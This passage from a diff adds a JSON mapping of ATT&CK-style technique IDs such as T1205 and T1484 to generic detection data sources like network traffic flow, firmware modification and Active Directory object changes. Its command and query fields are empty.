"responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1495", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1484", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects 
(Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object creation", + "description": "An active directory object was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object deletion", + "description": "An active directory object was deleted", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + 
"target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1205", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1149", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1153", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + 
